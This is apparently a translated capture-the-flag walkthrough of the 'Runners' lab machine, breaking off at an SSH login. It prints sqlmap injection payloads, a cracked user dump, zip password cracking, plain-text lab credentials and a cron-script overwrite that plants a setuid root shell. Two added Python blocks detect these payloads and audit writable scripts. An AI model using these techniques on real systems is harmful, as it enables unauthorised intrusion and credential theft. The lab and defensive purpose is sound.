TheHackersLabs-Runners Machine Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.158 08:00:27:08:b9:dd (Unknown)
192.168.60.254 00:50:56:e0:e6:12 (Unknown)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.047 seconds (125.06 hosts/sec). 4 responded
export ip=192.168.60.158
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.158:22
Open 192.168.60.158:80
Open 192.168.60.158:2222
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 16:56 CST
Initiating ARP Ping Scan at 16:56
Scanning 192.168.60.158 [1 port]
Completed ARP Ping Scan at 16:56, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:56
Completed Parallel DNS resolution of 1 host. at 16:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:56
Scanning 192.168.60.158 [3 ports]
Discovered open port 22/tcp on 192.168.60.158
Discovered open port 80/tcp on 192.168.60.158
Discovered open port 2222/tcp on 192.168.60.158
Completed SYN Stealth Scan at 16:56, 0.09s elapsed (3 total ports)
Nmap scan report for 192.168.60.158
Host is up, received arp-response (0.00085s latency).
Scanned at 2025-01-17 16:56:57 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 63
2222/tcp open EtherNetIP-1 syn-ack ttl 63
MAC Address: 08:00:27:08:B9:DD (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Visiting port 80 shows a blog about running.

Brute-force the directories.

Nothing much of interest; there is a db.php, but it returns an empty response (size 0).

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.158
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/LICENSE.txt (Status: 200) [Size: 17128]
/README.txt (Status: 200) [Size: 820]
/about.php (Status: 200) [Size: 9745]
/assets (Status: 301) [Size: 317] [--> http://192.168.60.158/assets/]
/db.php (Status: 200) [Size: 0]
/elements.html (Status: 200) [Size: 25373]
/images (Status: 301) [Size: 317] [--> http://192.168.60.158/images/]
/index.php (Status: 200) [Size: 6178]
/index.php (Status: 200) [Size: 6178]
/post.php (Status: 200) [Size: 4395]
/posts.php (Status: 200) [Size: 5235]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

SQL Injection

However, I noticed that the article links carry an ?id= parameter.

A blind guess: it may be SQL-injectable.

Throw sqlmap at it: the parameter is injectable, including time-based blind injection.

❯ sqlmap -u "http://192.168.60.158/post.php?id=1" --batch
___
__H__
___ ___[,]_____ ___ ___ {1.8.12#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:15:50 /2025-01-17/

[17:15:50] [INFO] testing connection to the target URL
[17:15:50] [INFO] testing if the target URL content is stable
[17:15:50] [INFO] target URL content is stable
[17:15:50] [INFO] testing if GET parameter 'id' is dynamic
[17:15:50] [INFO] GET parameter 'id' appears to be dynamic
[17:15:50] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[17:15:50] [INFO] testing for SQL injection on GET parameter 'id'
[17:15:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:15:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="La")
[17:15:51] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:15:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:15:51] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[17:15:51] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[17:15:51] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:15:51] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:15:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:15:51] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[17:15:51] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[17:15:51] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[17:15:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'Generic inline queries'
[17:15:51] [INFO] testing 'MySQL inline queries'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:15:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:15:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:16:01] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:16:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:16:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:16:01] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:16:01] [INFO] target URL appears to have 3 columns in query
[17:16:01] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 77 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5515=5515

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4261 FROM (SELECT(SLEEP(5)))Wugi)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9581 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x7850696a4a77695942616f765453594d66466271666e526a434e5952476969766a7a647367486355,0x7176706a71)-- -
---
[17:16:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:16:01] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/192.168.60.158'

[*] ending @ 17:16:01 /2025-01-17/
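As an added defender-side example (not part of the original writeup): a small Python detector that parses Apache-style access log lines and flags the three payload families sqlmap reported for post.php?id= on this box (boolean tautology, SLEEP() delay, UNION ALL SELECT). The log lines are constructed for this example; the long CONCAT hex in the UNION payload is shortened.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Signatures for the three payload families sqlmap reported against
# post.php?id= on this box: a boolean tautology, a SLEEP()-based delay and a
# UNION ALL SELECT column probe. Matching is done on the decoded value.
INJECTION_PATTERNS = {
    "boolean-blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+\b", re.I),
    "time-blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# Apache combined log format; only client, request path and status are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(path):
    """Return the injection families whose signature matches any query value."""
    found = []
    for values in parse_qs(urlsplit(path).query, keep_blank_values=True).values():
        for value in values:
            # parse_qs decoded once; decode again so %2520-style double
            # encoding cannot hide a keyword (a literal '%' is rare in ids).
            decoded = unquote_plus(value)
            for family, pattern in INJECTION_PATTERNS.items():
                if family not in found and pattern.search(decoded):
                    found.append(family)
    return found


def scan_log(lines):
    """Return one alert dict per request whose query string matches a signature."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        families = classify_request(m["path"])
        if families:
            alerts.append({"ip": m["ip"], "path": m["path"],
                           "status": int(m["status"]), "families": families})
    return alerts


def requests_per_source(lines):
    """Count matching requests per client; sqlmap needed 77 for this target."""
    counts = {}
    for alert in scan_log(lines):
        counts[alert["ip"]] = counts.get(alert["ip"], 0) + 1
    return counts


# Constructed sample: the payloads are the ones sqlmap printed for this box,
# URL-encoded the way they appear in an access log (CONCAT hex shortened).
SAMPLE_LOG = [
    '192.168.60.100 - - [17/Jan/2025:17:15:50 +0800] "GET /post.php?id=1 HTTP/1.1" 200 4395 "-" "sqlmap/1.8.12#stable"',
    '192.168.60.100 - - [17/Jan/2025:17:15:51 +0800] "GET /post.php?id=1%20AND%205515=5515 HTTP/1.1" 200 4395 "-" "sqlmap/1.8.12#stable"',
    '192.168.60.100 - - [17/Jan/2025:17:15:56 +0800] "GET /post.php?id=1%20AND%20(SELECT%204261%20FROM%20(SELECT(SLEEP(5)))Wugi) HTTP/1.1" 200 4395 "-" "sqlmap/1.8.12#stable"',
    '192.168.60.100 - - [17/Jan/2025:17:16:01 +0800] "GET /post.php?id=-9581%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71787a7a71,0x78,0x7176706a71)--%20- HTTP/1.1" 200 4500 "-" "sqlmap/1.8.12#stable"',
    '192.168.60.1 - - [17/Jan/2025:17:20:03 +0800] "GET /posts.php HTTP/1.1" 200 5235 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["families"], alert["path"])
    print(requests_per_source(SAMPLE_LOG))
```

The same signatures can be fed to a WAF or SIEM rule; a burst of matches from one client against a single parameter, as in the 77-request run above, is the stronger signal than any single line.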

Dump the users table from the database.

❯ sqlmap -u "http://192.168.60.158/post.php?id=1" --batch  -D blog -T users --dump
___
__H__
___ ___[(]_____ ___ ___ {1.8.12#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:16:53 /2025-01-17/

[17:16:53] [INFO] resuming back-end DBMS 'mysql'
[17:16:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5515=5515

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4261 FROM (SELECT(SLEEP(5)))Wugi)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9581 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x7850696a4a77695942616f765453594d66466271666e526a434e5952476969766a7a647367486355,0x7176706a71)-- -
---
[17:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:16:53] [INFO] fetching columns for table 'users' in database 'blog'
[17:16:53] [INFO] fetching entries for table 'users' in database 'blog'
[17:16:54] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[17:16:54] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[17:16:54] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[17:16:54] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[17:16:54] [INFO] starting 4 processes
[17:16:57] [INFO] cracked password 'runner' for user 'david'
Database: blog
Table: users
[3 entries]
+----+---------------------------------------------------------------------------+----------+
| id | password | username |
+----+---------------------------------------------------------------------------+----------+
| 1 | 527aa9f431539da8e151d5434d1d5e611d973f601d8e970790882624554146b0 (runner) | david |
| 2 | 7927e941a969cdf471354e79b7ae29ae25ca04d59f66d6c19f9c43a9367ec498 | maria |
| 3 | febb36d29baf28da1a00cad0cc6937d49f13738ff9dd88276e7c85920d2bff40 | ian |
+----+---------------------------------------------------------------------------+----------+

[17:17:00] [INFO] table 'blog.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.158/dump/blog/users.csv'
[17:17:00] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/192.168.60.158'

[*] ending @ 17:17:00 /2025-01-17/

User Privilege Escalation

There is a user david, and the password is simply runner.

Logging in on port 22 fails, so I guess port 2222 is mapped out of a Docker container.

Try logging in to SSH on port 2222.

Sure enough, this user lives inside a Docker environment.

❯ ssh david@192.168.60.158 -p 2222
The authenticity of host '[192.168.60.158]:2222 ([192.168.60.158]:2222)' can't be established.
ED25519 key fingerprint is SHA256:0PpHfqtGNxbHeILNpRebyOVMei8/5L6vgtwoUePOZOM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.158]:2222' (ED25519) to the list of known hosts.
david@192.168.60.158's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 6.8.0-49-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Nov 28 19:37:50 2024 from 192.168.1.17
david@30acf6ca1fb6:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.20.0.2 netmask 255.255.0.0 broadcast 172.20.255.255
ether 02:42:ac:14:00:02 txqueuelen 0 (Ethernet)
RX packets 366218 bytes 54572501 (54.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 316574 bytes 374285100 (374.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 534331 bytes 232298078 (232.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 534331 bytes 232298078 (232.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


The home directory contains a hidden file; after recovering the archive password, we get an Excel file.

david@30acf6ca1fb6:~$ ls -al
total 28
drwxr-xr-x 4 david david 4096 Nov 28 17:47 .
drwxr-xr-x 1 root root 4096 Nov 28 17:30 ..
lrwxrwxrwx 1 root root 9 Nov 28 17:30 .bash_history -> /dev/null
-rw-r--r-- 1 david david 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 david david 3771 Feb 25 2020 .bashrc
drwx------ 2 david david 4096 Nov 28 17:47 .cache
drwxr-xr-x 2 david david 4096 Nov 28 19:36 .hidden
-rw-r--r-- 1 david david 807 Feb 25 2020 .profile
david@30acf6ca1fb6:~$ cd .hidden/
david@30acf6ca1fb6:~/.hidden$ ls
credenciales.zip
------------------ separator ------------------
❯ scp -P 2222 david@192.168.60.158:.hidden/credenciales.zip .
david@192.168.60.158's password:
credenciales.zip 100% 4928 1.4MB/s 00:00
~/thl
❯ zip2john credenciales.zip >hash
ver 2.0 efh 5455 efh 7875 credenciales.zip/credenciales.xlsx PKZIP Encr: TS_chk, cmplen=4728, decmplen=5346, crc=BA8EA891 ts=7424 cs=7424 type=8
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockandroll (credenciales.zip/credenciales.xlsx)
1g 0:00:00:00 DONE (2025-01-17 17:26) 33.33g/s 273066p/s 273066c/s 273066C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ unzip credenciales.zip
Archive: credenciales.zip
[credenciales.zip] credenciales.xlsx password:
inflating: credenciales.xlsx

This yields maria's credential: 4br53#j6p78mq#zbvc

Scheduled Task (Cron)

Meanwhile, a database backup script is found under /opt.

Presumably root runs it on a schedule.

Upload pspy64 to confirm.

david@30acf6ca1fb6:/home$ su maria
Password:
maria@30acf6ca1fb6:/opt/scripts$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Dec 2 15:56 .
drwxr-xr-x 1 root root 4096 Nov 28 17:40 ..
-rwxrwx--x 1 root maria 797 Dec 2 15:56 backup.sh
maria@30acf6ca1fb6:/opt/scripts$ cat backup.sh
#!/bin/bash

BACKUP_DIR="/srv/backups"
DB_NAME="blog"
DB_USER="root"
ZIP_PASSWORD="metallica"

BACKUP_FILE="$BACKUP_DIR/blog_backup_$(date +'%Y%m%d%H%M').sql"
/usr/bin/mysqldump -u $DB_USER $DB_NAME > $BACKUP_FILE

zip -P "$ZIP_PASSWORD" "${BACKUP_FILE}.zip" "$BACKUP_FILE"

rm -f "$BACKUP_FILE"

echo "$(date): Backup comprimido de la base de datos '$DB_NAME' creado en ${BACKUP_FILE}.zip" >> /var/log/backup.log

function cleanup_backups {
local total_backups=$(ls -1t "$BACKUP_DIR"/*.zip 2>/dev/null | wc -l)

if (( total_backups > 10 )); then
ls -1t "$BACKUP_DIR"/*.zip | tail -n +11 | while read -r old_backup; do
rm -f "$old_backup"
echo "$(date): Backup antiguo eliminado: $old_backup" >> /var/log/backup.log
done
fi
}

cleanup_backups


maria@30acf6ca1fb6:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/01/17 09:33:01 CMD: UID=0 PID=1118 | /usr/sbin/CRON -f
2025/01/17 09:33:01 CMD: UID=0 PID=1117 | /usr/sbin/CRON -f
2025/01/17 09:33:01 CMD: UID=0 PID=1119 | /bin/sh -c /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1120 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1121 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1122 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1123 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1124 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1127 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1126 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1125 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1130 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1129 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1128 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1131 | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0 PID=1132 | /bin/bash /opt/scripts/backup.sh
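An added example, not part of the original writeup: a Python audit of what pspy just revealed, a script that root's cron executes but that a non-root group can write, plus the hard-coded ZIP_PASSWORD inside it (the same string turns up again later on this box). The backup.sh excerpt is copied from the page; the temp-file helper exists only for demonstration.

```python
import os
import re
import stat
import tempfile

# Assignment of a literal (not a $-expansion) to a variable whose name
# suggests a secret, e.g. ZIP_PASSWORD="metallica" in the box's backup.sh.
SECRET_ASSIGNMENT = re.compile(
    r'''^\s*(?:export\s+)?(?P<name>[A-Za-z_]*(?:PASS(?:WORD)?|SECRET|TOKEN)[A-Za-z0-9_]*)'''
    r'''\s*=\s*["']?(?!\$)[^"'\s]+''',
    re.I,
)


def mode_findings(mode):
    """Permission problems for a script that a root cron job executes.

    Whoever can write the file controls what root runs. The box's backup.sh
    was -rwxrwx--x root:maria (0o771), so group maria could edit it.
    """
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def secret_assignments(text):
    """(line number, variable name) for every hard-coded secret in shell text."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        m = SECRET_ASSIGNMENT.match(line)
        if m:
            hits.append((number, m["name"]))
    return hits


def audit_cron_script(path):
    """Combine ownership, permission and content checks for one script path."""
    findings = []
    st = os.stat(path)
    if st.st_uid != 0:
        findings.append(f"not owned by root (uid {st.st_uid})")
    findings += mode_findings(st.st_mode)
    parent_mode = os.stat(os.path.dirname(os.path.abspath(path))).st_mode
    # A writable parent directory lets a user replace the script even when the
    # file itself is locked down (unless the sticky bit is set, as on /tmp).
    if parent_mode & (stat.S_IWGRP | stat.S_IWOTH) and not parent_mode & stat.S_ISVTX:
        findings.append("parent directory writable by non-owner")
    with open(path, encoding="utf-8", errors="replace") as fh:
        for number, name in secret_assignments(fh.read()):
            findings.append(f"hard-coded secret {name} on line {number}")
    return findings


def write_temp_script(text, mode):
    """Demonstration helper: write text to a temp file with the given mode."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    os.chmod(path, mode)
    return path


# Excerpt of the backup.sh shown in the writeup (first lines only).
BACKUP_SH = """#!/bin/bash

BACKUP_DIR="/srv/backups"
DB_NAME="blog"
DB_USER="root"
ZIP_PASSWORD="metallica"

BACKUP_FILE="$BACKUP_DIR/blog_backup_$(date +'%Y%m%d%H%M').sql"
/usr/bin/mysqldump -u $DB_USER $DB_NAME > $BACKUP_FILE
zip -P "$ZIP_PASSWORD" "${BACKUP_FILE}.zip" "$BACKUP_FILE"
"""

if __name__ == "__main__":
    script = write_temp_script(BACKUP_SH, 0o771)  # same mode as on the box
    for finding in audit_cron_script(script):
        print(finding)
    os.unlink(script)
```

The fix on the box side is the obvious one: root-owned script with mode 0700 or 0755, and the archive password read from a root-only file rather than embedded in a script that another group can read.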

We have read, write and execute permission on this script (group maria, mode rwx), so we can simply modify the file.

maria@30acf6ca1fb6:/opt/scripts$ echo -e "cp /bin/bash /tmp/sh\nchmod +s /tmp/sh">backup.sh
maria@30acf6ca1fb6:/opt/scripts$ cat backup.sh
cp /bin/bash /tmp/sh
chmod +s /tmp/sh

2025/01/17 09:37:01 CMD: UID=0 PID=1192 | /usr/sbin/CRON -f
2025/01/17 09:37:01 CMD: UID=0 PID=1191 | /usr/sbin/CRON -f
2025/01/17 09:37:01 CMD: UID=0 PID=1193 | /bin/sh /opt/scripts/backup.sh
2025/01/17 09:37:01 CMD: UID=0 PID=1194 | /bin/sh /opt/scripts/backup.sh
2025/01/17 09:37:01 CMD: UID=0 PID=1195 | chmod +s /tmp/sh
----------------- separator -------------
maria@30acf6ca1fb6:/tmp$ ./sh -p
sh-5.0# id
uid=1001(maria) gid=1001(maria) euid=0(root) egid=0(root) groups=0(root),1001(maria)
sh-5.0# whoami
root
sh-5.0# cd /root
sh-5.0# ls
TODO_LIST.txt
sh-5.0# cat TODO_LIST.txt
1. Crear un script para automatizar los backups de la base de datos. (OK)
2. Cifrar las contraseñas de la base de datos. (OK)
3. Avisar a Ian para que cambie su contraseña, a ver si deja usar su famosa contraseña "iambatman" en todos lados. (Pendiente)
1. Create a script to automate database backups. (OK)
2. Encrypt the database passwords. (OK)
3. Tell Ian to change his password, and see whether he stops using his famous password "iambatman" everywhere. (Pending)

The note hints at a password.

Root Privilege Escalation

Trying SSH with it fails; changing the first letter to lowercase works.

❯ ssh ian@192.168.60.158
ian@192.168.60.158's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-49-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Fri Jan 17 09:46:47 AM UTC 2025

System load: 0.11 Processes: 134
Usage of /: 45.0% of 18.53GB Users logged in: 0
Memory usage: 38% IPv4 address for enp0s3: 192.168.60.158
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
